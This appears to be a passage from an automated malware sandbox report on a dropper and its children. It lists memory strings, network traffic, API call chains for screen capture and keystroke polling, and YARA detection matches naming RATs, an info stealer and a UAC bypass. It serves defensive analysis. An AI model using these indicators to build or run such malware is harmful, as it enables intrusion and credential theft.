Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/NxIDhpMpHGkydnaCixJBjyQJs.exe
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown

HTTPS traffic detected: 185.93.1.247:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Code function: 3_2_00BAC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

3_2_00BAC8B0

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Code function: 3_2_6C8FA5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

3_2_6C8FA5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.run.exe.39d686d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.run.exe.3e7ad5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.run.exe.3a1ad5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 15.2.cmd.exe.4c3b976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.4a80e64.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.3e7a15b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 14.2.run.exe.3a1a15b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.4c7f264.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.4a3c976.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.4c7fe64.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.3e3686d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.4a80264.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6BA5F280
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BABB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6BABB910
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BABB8C0 rand_s,NtQueryVirtualMemory,	1_2_6BABB8C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BABB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6BABB700
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA7ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	1_2_6BA7ED10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	1_2_6BC862C0

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_04152607	0_2_04152607
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414BE87	0_2_0414BE87
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414C6B3	0_2_0414C6B3
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414F6A8	0_2_0414F6A8
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414C131	0_2_0414C131
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0415B989	0_2_0415B989
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_041489C8	0_2_041489C8
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414CA63	0_2_0414CA63
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414BB15	0_2_0414BB15
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: 0_2_0414C3F8	0_2_0414C3F8
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA535A0	1_2_6BA535A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5F380	1_2_6BA5F380
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC53C8	1_2_6BAC53C8
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA9D320	1_2_6BA9D320
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA6C370	1_2_6BA6C370
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA55340	1_2_6BA55340
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA522A0	1_2_6BA522A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA84AA0	1_2_6BA84AA0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA6CAB0	1_2_6BA6CAB0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC2AB0	1_2_6BAC2AB0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BACBA90	1_2_6BACBA90
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA71AF0	1_2_6BA71AF0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA9E2F0	1_2_6BA9E2F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA98AC0	1_2_6BA98AC0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA99A60	1_2_6BA99A60
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5C9A0	1_2_6BA5C9A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA8D9B0	1_2_6BA8D9B0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA95190	1_2_6BA95190
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAB2990	1_2_6BAB2990
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA6D960	1_2_6BA6D960
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAAB970	1_2_6BAAB970
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BACB170	1_2_6BACB170
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA7A940	1_2_6BA7A940
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA860A0	1_2_6BA860A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA7C0E0	1_2_6BA7C0E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA958E0	1_2_6BA958E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC50C7	1_2_6BAC50C7
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA9B820	1_2_6BA9B820
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAA4820	1_2_6BAA4820
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA67810	1_2_6BA67810
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA9F070	1_2_6BA9F070
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA78850	1_2_6BA78850
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA7D850	1_2_6BA7D850
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAA77A0	1_2_6BAA77A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5DFE0	1_2_6BA5DFE0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA86FF0	1_2_6BA86FF0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA69F00	1_2_6BA69F00
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA97710	1_2_6BA97710
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAB4EA0	1_2_6BAB4EA0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BABE680	1_2_6BABE680
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA75E90	1_2_6BA75E90
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC76E3	1_2_6BAC76E3
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5BEF0	1_2_6BA5BEF0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA6FEF0	1_2_6BA6FEF0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAB9E30	1_2_6BAB9E30
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAA5600	1_2_6BAA5600
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA97E10	1_2_6BA97E10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC6E63	1_2_6BAC6E63
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5C670	1_2_6BA5C670
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAA2E4E	1_2_6BAA2E4E
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA74640	1_2_6BA74640
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA79E50	1_2_6BA79E50
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA93E50	1_2_6BA93E50
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAB85F0	1_2_6BAB85F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA90DD0	1_2_6BA90DD0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA6FD00	1_2_6BA6FD00
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA7ED10	1_2_6BA7ED10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA80512	1_2_6BA80512
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAB34A0	1_2_6BAB34A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BABC4A0	1_2_6BABC4A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA66C80	1_2_6BA66C80
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA5D4E0	1_2_6BA5D4E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA96CF0	1_2_6BA96CF0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA664C0	1_2_6BA664C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA7D4D0	1_2_6BA7D4D0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC542B	1_2_6BAC542B
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BACAC00	1_2_6BACAC00
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA95C10	1_2_6BA95C10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAA2C10	1_2_6BAA2C10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA65440	1_2_6BA65440
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAC545C	1_2_6BAC545C
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBA0BA0	1_2_6BBA0BA0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC06BE0	1_2_6BC06BE0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB7EA80	1_2_6BB7EA80
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBB8A30	1_2_6BBB8A30
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBAEA00	1_2_6BBAEA00
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB7CA70	1_2_6BB7CA70
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBC09B0	1_2_6BBC09B0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB909A0	1_2_6BB909A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBBA9A0	1_2_6BBBA9A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC1C9E0	1_2_6BC1C9E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB349F0	1_2_6BB349F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB56900	1_2_6BB56900
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB38960	1_2_6BB38960
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC068E0	1_2_6BC068E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBEC8C0	1_2_6BBEC8C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB50820	1_2_6BB50820
